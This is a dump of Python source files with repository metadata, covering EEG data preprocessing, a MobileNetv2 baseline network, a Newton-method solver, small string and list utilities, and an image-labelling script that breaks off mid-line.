a_data = a['data']\n for ii in range(0, a_data.size):\n a_data1 = a_data[0, ii]\n a_data2 = [a_data1[0, 0]]\n a_data3 = a_data2[0]\n a_X = a_data3[0]\n a_trial = a_data3[1]\n a_y = a_data3[2]\n a_fs = a_data3[3]\n # a_classes = a_data3[4]\n a_artifacts = a_data3[5]\n # a_gender = a_data3[6]\n # a_age = a_data3[7]\n\n for trial in range(0, a_trial.size):\n if a_artifacts[trial] == 0:\n range_a = int(a_trial[trial])\n range_b = range_a + Window_Length\n data_return[n_valid_trials, :, :] = np.transpose(a_X[range_a:range_b, :22])\n class_return[n_valid_trials] = int(a_y[trial])\n n_valid_trials += 1\n\n data_return = data_return[0:n_valid_trials, :, :]\n class_return = class_return[0:n_valid_trials]\n\n class_return = class_return - 1\n\n data_return = t.Tensor(data_return).to(dtype=t.float)\n class_return = t.Tensor(class_return).to(dtype=t.long)\n\n return data_return, class_return\n\n\nclass HighpassFilter(object):\n\n def __init__(self, fs, fc, order):\n nyq = 0.5 * fs\n norm_fc = fc / nyq\n self.sos = butter(order, norm_fc, btype='highpass', output='sos')\n\n def __call__(self, sample):\n for ch in sample.shape[0]:\n sample[ch, :] = sosfilt(self.sos, sample[ch, :])\n return sample\n\n\nclass BandpassFilter(object):\n\n def __init__(self, fs, fc_low, fc_high, order):\n nyq = 0.5 * fs\n norm_fc_low = fc_low / nyq\n norm_fc_high = fc_high / nyq\n self.sos = butter(order, [norm_fc_low, norm_fc_high], btype='bandpass', output='sos')\n\n def __call__(self, sample):\n for ch in sample.shape[0]:\n sample[ch, :] = sosfilt(self.sos, sample[ch, :])\n return sample\n\n\nclass Identity(object):\n\n def __call__(self, sample):\n return sample\n\n\nclass TimeWindowPostCue(object):\n\n def __init__(self, fs, t1_factor, t2_factor):\n self.t1 = int(t1_factor * fs)\n self.t2 = int(t2_factor * fs)\n\n def __call__(self, sample):\n return sample[:, :, self.t1:self.t2]\n\n\nclass ReshapeTensor(object):\n def __call__(self, sample):\n return sample.view(1, sample.shape[0], sample.shape[1])\n\n\ndef get_transform(fs, t1_factor, t2_factor, filter_config):\n # make sure that filter_config exists\n if filter_config is None:\n filter_config = {'type': None}\n elif 'type' not in filter_config:\n filter_config['type'] = 'none'\n\n if filter_config['type'] == 'highpass':\n filter_transform = HighpassFilter(fs, filter_config['fc'], filter_config['order'])\n elif filter_config['type'] == 'bandpass':\n filter_transform = BandpassFilter(fs, filter_config['fc_low'], filter_config['fc_high'],\n filter_config['order'])\n else:\n filter_transform = Identity()\n\n return Compose([filter_transform,\n ReshapeTensor(),\n TimeWindowPostCue(fs, t1_factor, t2_factor)])\n\n\ndef load_data_sets(dir_data, data_config):\n transform = get_transform(data_config['fs'], data_config['t1_factor'],\n data_config['t2_factor'], data_config['filter'])\n trainvalid_set = BCI_CompIV_2a(root=dir_data, train=True, subject=data_config['subject'])\n if data_config.get(\"use_test_as_valid\", False):\n # use the test set as the validation set\n train_set = trainvalid_set\n train_set.transform = transform\n valid_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n test_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n else:\n # split train set into train and validation set\n len_train = int(len(trainvalid_set) * (1.0 - data_config['valid_fraction']))\n train_set, valid_set = transform_random_split(trainvalid_set, [len_train, len(trainvalid_set) - len_train],\n [transform, transform])\n test_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.8211382031440735, "alphanum_fraction": 0.8211382031440735, "avg_line_length": 29.75, "blob_id": "0733cdb873686f9a2a8522de58d51e709aa632e2", "content_id": "49b48b55882238b2f7543eb3ab02af02d4735436", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ImageNet/ResNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .resnet import ResNet\n" }, { "alpha_fraction": 0.4952325224876404, "alphanum_fraction": 0.5608072280883789, "avg_line_length": 43.173126220703125, "blob_id": "186d03dd37fec0246b9686f74255a71287e0f975", "content_id": "8461933b6858f1f9365916e27febc8d32d26874e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17095, "license_type": "permissive", "max_line_length": 102, "num_lines": 387, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2baseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"MobileNetv2Baseline\",\n# \"params\": {\"capacity\": 1, \"expansion\": 6},\n# \"pretrained\": null,\n# \"loss_fn\": {\n# \"class\": \"CrossEntropyLoss\",\n# \"params\": {}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"MobileNetv2Baseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass MobileNetv2Baseline(nn.Module):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6):\n super().__init__()\n c0 = 3\n t0 = int(32 * capacity) * 1\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n # first block\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = nn.ReLU6(inplace=True)\n self.phi02_conv = nn.Conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = nn.ReLU6(inplace=True)\n self.phi03_conv = nn.Conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = nn.Conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = nn.ReLU6(inplace=True)\n self.phi05_conv = nn.Conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = nn.ReLU6(inplace=True)\n self.phi06_conv = nn.Conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi07_conv = nn.Conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = nn.ReLU6(inplace=True)\n self.phi08_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = nn.ReLU6(inplace=True)\n self.phi09_conv = nn.Conv2d(t2, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = nn.Conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = nn.ReLU6(inplace=True)\n self.phi11_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = nn.ReLU6(inplace=True)\n self.phi12_conv = nn.Conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi13_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = nn.ReLU6(inplace=True)\n self.phi14_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = nn.ReLU6(inplace=True)\n self.phi15_conv = nn.Conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi16_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = nn.ReLU6(t3)\n self.phi17_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = nn.ReLU6(inplace=True)\n self.phi18_conv = nn.Conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = nn.ReLU6(inplace=True)\n self.phi20_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = nn.ReLU6(inplace=True)\n self.phi21_conv = nn.Conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi22_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = nn.ReLU6(inplace=True)\n self.phi23_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = nn.ReLU6(inplace=True)\n self.phi24_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi25_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = nn.ReLU6(inplace=True)\n self.phi26_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = nn.ReLU6(inplace=True)\n self.phi27_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi28_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = nn.ReLU6(inplace=True)\n self.phi29_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = nn.ReLU6(inplace=True)\n self.phi30_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = nn.ReLU6(inplace=True)\n self.phi32_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = nn.ReLU6(inplace=True)\n self.phi33_conv = nn.Conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi34_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = nn.ReLU6(inplace=True)\n self.phi35_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = nn.BatchNorm2d(t5)\n self.phi35_act = nn.ReLU6(inplace=True)\n self.phi36_conv = nn.Conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi37_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = nn.ReLU6(inplace=True)\n self.phi38_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = nn.ReLU6(inplace=True)\n self.phi39_conv = nn.Conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = nn.ReLU6(inplace=True)\n self.phi41_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = nn.ReLU6(inplace=True)\n self.phi42_conv = nn.Conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi43_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = nn.ReLU6(inplace=True)\n self.phi44_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = nn.ReLU6(inplace=True)\n self.phi45_conv = nn.Conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi46_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = nn.ReLU6(inplace=True)\n self.phi47_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = nn.ReLU6(inplace=True)\n self.phi48_conv = nn.Conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = nn.ReLU6(inplace=True)\n self.phi50_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = nn.ReLU6(inplace=True)\n self.phi51_conv = nn.Conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = nn.Conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = nn.ReLU6(inplace=True)\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def forward(self, x, withStats=False):\n # first block\n x = self.phi01_conv(x)\n x = self.phi01_bn(x)\n x = self.phi01_act(x)\n x = self.phi02_conv(x)\n x = self.phi02_bn(x)\n x = self.phi02_act(x)\n x = self.phi03_conv(x)\n x = self.phi03_bn(x)\n # second block\n x = self.phi04_conv(x)\n x = self.phi04_bn(x)\n x = self.phi04_act(x)\n x = self.phi05_conv(x)\n x = self.phi05_bn(x)\n x = self.phi05_act(x)\n x = self.phi06_conv(x)\n x = self.phi06_bn(x)\n x_res = self.phi07_conv(x)\n x_res = self.phi07_bn(x_res)\n x_res = self.phi07_act(x_res)\n x_res = self.phi08_conv(x_res)\n x_res = self.phi08_bn(x_res)\n x_res = self.phi08_act(x_res)\n x_res = self.phi09_conv(x_res)\n x_res = self.phi09_bn(x_res)\n x = x + x_res\n # third block\n x = self.phi10_conv(x)\n x = self.phi10_bn(x)\n x = self.phi10_act(x)\n x = self.phi11_conv(x)\n x = self.phi11_bn(x)\n x = self.phi11_act(x)\n x = self.phi12_conv(x)\n x = self.phi12_bn(x)\n x_res = self.phi13_conv(x)\n x_res = self.phi13_bn(x_res)\n x_res = self.phi13_act(x_res)\n x_res = self.phi14_conv(x_res)\n x_res = self.phi14_bn(x_res)\n x_res = self.phi14_act(x_res)\n x_res = self.phi15_conv(x_res)\n x_res = self.phi15_bn(x_res)\n x = x + x_res\n x_res = self.phi16_conv(x)\n x_res = self.phi16_bn(x_res)\n x_res = self.phi16_act(x_res)\n x_res = self.phi17_conv(x_res)\n x_res = self.phi17_bn(x_res)\n x_res = self.phi17_act(x_res)\n x_res = self.phi18_conv(x_res)\n x_res = self.phi18_bn(x_res)\n x = x + x_res\n # fourth block\n x = self.phi19_conv(x)\n x = self.phi19_bn(x)\n x = self.phi19_act(x)\n x = self.phi20_conv(x)\n x = self.phi20_bn(x)\n x = self.phi20_act(x)\n x = self.phi21_conv(x)\n x = self.phi21_bn(x)\n x_res = self.phi22_conv(x)\n x_res = self.phi22_bn(x_res)\n x_res = self.phi22_act(x_res)\n x_res = self.phi23_conv(x_res)\n x_res = self.phi23_bn(x_res)\n x_res = self.phi23_act(x_res)\n x_res = self.phi24_conv(x_res)\n x_res = self.phi24_bn(x_res)\n x = x + x_res\n x_res = self.phi25_conv(x)\n x_res = self.phi25_bn(x_res)\n x_res = self.phi25_act(x_res)\n x_res = self.phi26_conv(x_res)\n x_res = self.phi26_bn(x_res)\n x_res = self.phi26_act(x_res)\n x_res = self.phi27_conv(x_res)\n x_res = self.phi27_bn(x_res)\n x = x + x_res\n x_res = self.phi28_conv(x)\n x_res = self.phi28_bn(x_res)\n x_res = self.phi28_act(x_res)\n x_res = self.phi29_conv(x_res)\n x_res = self.phi29_bn(x_res)\n x_res = self.phi29_act(x_res)\n x_res = self.phi30_conv(x_res)\n x_res = self.phi30_bn(x_res)\n x = x + x_res\n # fifth block\n x = self.phi31_conv(x)\n x = self.phi31_bn(x)\n x = self.phi31_act(x)\n x = self.phi32_conv(x)\n x = self.phi32_bn(x)\n x = self.phi32_act(x)\n x = self.phi33_conv(x)\n x = self.phi33_bn(x)\n x_res = self.phi34_conv(x)\n x_res = self.phi34_bn(x_res)\n x_res = self.phi34_act(x_res)\n x_res = self.phi35_conv(x_res)\n x_res = self.phi35_bn(x_res)\n x_res = self.phi35_act(x_res)\n x_res = self.phi36_conv(x_res)\n x_res = self.phi36_bn(x_res)\n x = x + x_res\n x_res = self.phi37_conv(x)\n x_res = self.phi37_bn(x_res)\n x_res = self.phi37_act(x_res)\n x_res = self.phi38_conv(x_res)\n x_res = self.phi38_bn(x_res)\n x_res = self.phi38_act(x_res)\n x_res = self.phi39_conv(x_res)\n x_res = self.phi39_bn(x_res)\n x = x + x_res\n # sixth block\n x = self.phi40_conv(x)\n x = self.phi40_bn(x)\n x = self.phi40_act(x)\n x = self.phi41_conv(x)\n x = self.phi41_bn(x)\n x = self.phi41_act(x)\n x = self.phi42_conv(x)\n x = self.phi42_bn(x)\n x_res = self.phi43_conv(x)\n x_res = self.phi43_bn(x_res)\n x_res = self.phi43_act(x_res)\n x_res = self.phi44_conv(x_res)\n x_res = self.phi44_bn(x_res)\n x_res = self.phi44_act(x_res)\n x_res = self.phi45_conv(x_res)\n x_res = self.phi45_bn(x_res)\n x = x + x_res\n x_res = self.phi46_conv(x)\n x_res = self.phi46_bn(x_res)\n x_res = self.phi46_act(x_res)\n x_res = self.phi47_conv(x_res)\n x_res = self.phi47_bn(x_res)\n x_res = self.phi47_act(x_res)\n x_res = self.phi48_conv(x_res)\n x_res = self.phi48_bn(x_res)\n x = x + x_res\n # seventh block\n x = self.phi49_conv(x)\n x = self.phi49_bn(x)\n x = self.phi49_act(x)\n x = self.phi50_conv(x)\n x = self.phi50_bn(x)\n x = self.phi50_act(x)\n x = self.phi51_conv(x)\n x = self.phi51_bn(x)\n # classifier\n x = self.phi52_conv(x)\n x = self.phi52_bn(x)\n x = self.phi52_act(x)\n x = self.phi53_avg(x)\n x = x.view(x.size(0), -1)\n x = self.phi53_fc(x)\n \n if withStats:\n stats = []\n return stats, x\n\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" } ]
40
reiracm/ANPI-Articulo2
https://github.com/reiracm/ANPI-Articulo2
e6ad564706e1eda0a795a01a05cafd5d04c131dc
cc865af2c35656d5e505c62f6e3815b3c46dcbe8
b1a53d4b13213d6e2cc8bf34f2aca229e757a6ac
refs/heads/master
2022-10-29T03:35:30.076618
2020-06-16T02:14:05
2020-06-16T02:14:05
272,588,450
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4267202913761139, "alphanum_fraction": 0.47765862941741943, "avg_line_length": 22.263158798217773, "blob_id": "8c5c1884349f527863023ad82ac3345f11f13732", "content_id": "c8c003c4268565432b3a2475fbe8629f54f8f4a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2239, "license_type": "no_license", "max_line_length": 108, "num_lines": 95, "path": "/metodo_1.py", "repo_name": "reiracm/ANPI-Articulo2", "src_encoding": "UTF-8", "text": "from sympy import Symbol\nimport numpy as np\n\n# From the exercise:\ndef function_exercise(wxyz):\n w, x, y, z = wxyz\n return [(w**2)+x-(3*y)+(4*z)+(3/4),\n (3*w**2)+x-(y**2)+(z**2)+(13/4),\n (5*w)+(3*x**2)+y-(4*z**2)-(99/2),(8*w**2)-(14*x)+(6*y**2)-(7*z**2)+7]\n\ndef jacobian_exercise(wxyz):\n w, x, y, z = wxyz\n return [[2*w,1,-3,4],\n [6*w,1,-2*y,2*z],\n [5,6*x,1,-8*z],[16*w,-14,12*y,-14*z]]\n\ndef JF(x):\n \n J_save = np.array(jacobian_exercise(x))\n \n return J_save\n\ndef F(x):\n \n F_save = np.array(function_exercise(x))\n \n return F_save\n\ndef iterative_newton(fun, var1, var2, jacobian,epsilon,itera):\n\n x_last = var1\n \n x_next = var2\n\n for i in range(itera):\n\n J = np.array(jacobian(x_last))\n \n F = np.array(fun(x_next))\n\n diff = np.linalg.solve( J, -F )\n \n x_last = x_last + diff\n \n x_next = x_next + diff\n\n # Validación del margen de error\n if np.linalg.norm(diff) < epsilon:\n \n return x_last\n \n break\n\n return x_last\n\n# For the exercice:\nx_sol = iterative_newton(function_exercise, [2.0,1.0,2.0,1.0],[2.0,1.0,2.0,1.0], jacobian_exercise, 0.1,100)\nprint('La solucion es:', x_sol )\n \n\ndef solve(x_0, tol, itera):\n\n a = (1) \n\n b = (-2)\n\n for i in range(itera):\n\n Jx_kF = iterative_newton(function_exercise, x_0, x_0,jacobian_exercise,tol,itera)\n\n y_k = x_0 - 1/2*(Jx_kF)\n\n Jy_kF = iterative_newton(function_exercise, y_k, x_0, jacobian_exercise,tol,itera)\n \n z_k = x_0 - Jy_kF\n\n Jy_xF = iterative_newton(function_exercise, y_k, x_0, jacobian_exercise,tol,itera)\n\n Jx_zF = iterative_newton(function_exercise, x_0, z_k, jacobian_exercise,tol,itera)\n\n Jy_zK = iterative_newton(function_exercise, y_k, z_k, jacobian_exercise,tol,itera)\n\n x_k = z_k - (a * Jx_zF) - (b * Jy_zK)\n\n x_0 = x_k\n \n return x_k\n \n \n \n \n\n#b = [-3/4,-13/4,99/2,-7]\n#x = 0\n#A = [[1,1,-3,4],[3,1,-1,1],[5,3,1,-4],[8,-14,6,-7]]\n \n \n \n \n" } ]
1
sruthi-perumalla/glarimy
https://github.com/sruthi-perumalla/glarimy
fd0a020c26edacf0793435d5e5c034679f5d5e0c
5b3c37433e0f72aefbf2f148d984360f2d276a42
f280cb800f83e40dcb373b89b8fc94d4c3b2f338
refs/heads/master
2022-11-30T20:38:15.440083
2020-08-17T11:26:50
2020-08-17T11:26:50
288,161,484
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5456919074058533, "alphanum_fraction": 0.5456919074058533, "avg_line_length": 19.27777862548828, "blob_id": "e43ade2dd9b0547294d7df4ec3ff165bee6566f9", "content_id": "5e5bb2e7c6d9d3ae14fbdf106efeb096cc238416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 31, "num_lines": 18, "path": "/parse.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "def parse(filename):\r\n infile = open(filename)\r\n words = []\r\n for line in infile:\r\n temp = line.split()\r\n for i in temp:\r\n words.append(i)\r\n infile.close()\r\n words.sort()\r\n print(words)\r\n uniue_char = []\r\n for c in words:\r\n for d in c:\r\n \r\n if not d in uniue_char:\r\n uniue_char.append(d)\r\n print(uniue_char)\r\nsorting(\"sample.txt\")\r\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.6227545142173767, "avg_line_length": 18.875, "blob_id": "61bb5598bafb47bbb91eb384c39e9432b8f0a18f", "content_id": "b38bb3e6c62bb9fddd0875a91aac950f11f02cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/unique.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "str=input()\r\ndef deduplicate(str):\r\n uniue_char = []\r\n for c in str:\r\n if not c in uniue_char:\r\n uniue_char.append(c)\r\n print(uniue_char)\r\ndeduplicate(str)\r\n" }, { "alpha_fraction": 0.5300546288490295, "alphanum_fraction": 0.5355191230773926, "avg_line_length": 18.33333396911621, "blob_id": "291de23aa0063f9ba6f51e75dc9b0d28cb40f127", "content_id": "6b61752d143cc9b574526166b36cb8352ac660cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 46, "num_lines": 9, "path": "/sort.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "lst = [] \r\nn = int(input(\"Enter number of elements : \") )\r\nfor i in range(0, n): \r\n ele = input()\r\n lst.append(ele)\r\ndef sort(lst):\r\n lst.sort()\r\n print(lst)\r\nsort(lst)\r\n" } ]
3
nitinpasi/FRI
https://github.com/nitinpasi/FRI
41ed8c2e1216d8c8c2752bd0bd5cb4cadb6ae9cf
2c18733525ab1c27feb4776659ec911ff2f44e41
92e6b6aec8dce6a450bdaf106591ba76dc0bcf6b
refs/heads/master
2020-03-22T09:07:55.146942
2018-07-05T06:53:09
2018-07-05T06:53:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5680415630340576, "alphanum_fraction": 0.5839558243751526, "avg_line_length": 26.990909576416016, "blob_id": "bc05db02389bf69b7d9f7c475fc654ffb98b3fb3", "content_id": "32035b8ec1895cd462cd41a9e54934f2ad43aa5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 181, "num_lines": 110, "path": "/FRI.py", "repo_name": "nitinpasi/FRI", "src_encoding": "UTF-8", "text": "import os, sys, csv, cv2\nimport numpy as np\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport warnings\nfrom PIL import Image\nfrom keras.preprocessing import image\nfrom keras.applications.imagenet_utils import preprocess_input\n\nfrom matplotlib.pyplot import imshow\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\n\n\npath = \"/Users/sharmarochan/Desktop/extracted files/augumented_image/\"\ntest_path = \"/Users/sharmarochan/Desktop/extracted files/resized_images/\"\n\n\ndirs = os.listdir( path )\ndirs_array = np.array(dirs)\ndirs_array_sort = np.sort(dirs_array)\n\n\ndef path_csv():\n with open('/Users/sharmarochan/Desktop/extracted files/image_path_lable.csv','w') as f:\n writer = csv.writer(f)\n lable =1\n image = 0\n val_store = \"Barking_deer\"\n\n\n for item in dirs_array_sort:\n\n if not item.startswith('.') and item != 'Thumbs.db':\n image = image + 1\n\n par1, par2, par3,par4,par5= item.rsplit('_', 4)\n im = path+item\n\n if val_store != par1:\n lable = lable + 1\n val_store = par1\n\n if not item.startswith('.') and item != 'Thumbs.db':\n if os.path.isfile(path + item):\n # im = Image.open(path + item)\n writer.writerow([im, lable])\n\n# path_csv()\n\n\n\ndef extract_pixels_from_jpg():\n\n with open('image_path_lable.csv', 'rb') as 